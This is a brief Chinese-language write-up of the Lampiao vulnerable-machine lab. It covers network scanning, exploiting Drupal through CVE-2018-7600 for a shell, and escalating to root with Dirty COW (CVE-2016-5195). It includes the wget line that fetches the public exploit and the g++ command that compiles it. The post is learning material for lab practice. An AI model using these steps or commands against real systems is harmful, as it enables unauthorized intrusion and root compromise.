Lampiao记录

打开虚拟机显示登陆界面,没密码,登个锤子,老老实实去扫描ip


Lampiao记录_第1张图片
图片.png

一个一个的去试,到141的时候看到正常的web界面,然后扔到nmap里面去扫端口

找到一个apache的1898端口,连上去试试


Lampiao记录_第2张图片
图片.png

真的有另一个网站,drupal的cms,用的是CVE-2018-7600代码执行这个漏洞
拿到shell,是一个www-data的权限,这里需要我们进行提权


图片.png

查看当前系统版本
Lampiao记录_第3张图片
图片.png

用到脏牛提权(CVE-2016-5195)

该程序成功用于:

  • RHEL7 Linux x86_64;
  • RHEL4(4.4.7-16,带“遗留”版本)
  • Debian 7(“wheezy”);
  • Ubuntu 14.04.1 LTS
  • Ubuntu 14.04.5 LTS
  • Ubuntu 16.04.1 LTS
  • Ubuntu 16.10
  • Linux Mint 17.2

因为靶机连不上网,所以我这里把利用的脚本下载到本地,放到web目录下

wget  https://www.exploit-db.com/download/40847.cpp

在服务器上同理down到本地,然后进行编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

之后在本地生成了一个dcow的文件


Lampiao记录_第4张图片
图片.png

拿到root密码,直接ssh连上去

你可能感兴趣的:(Lampiao记录)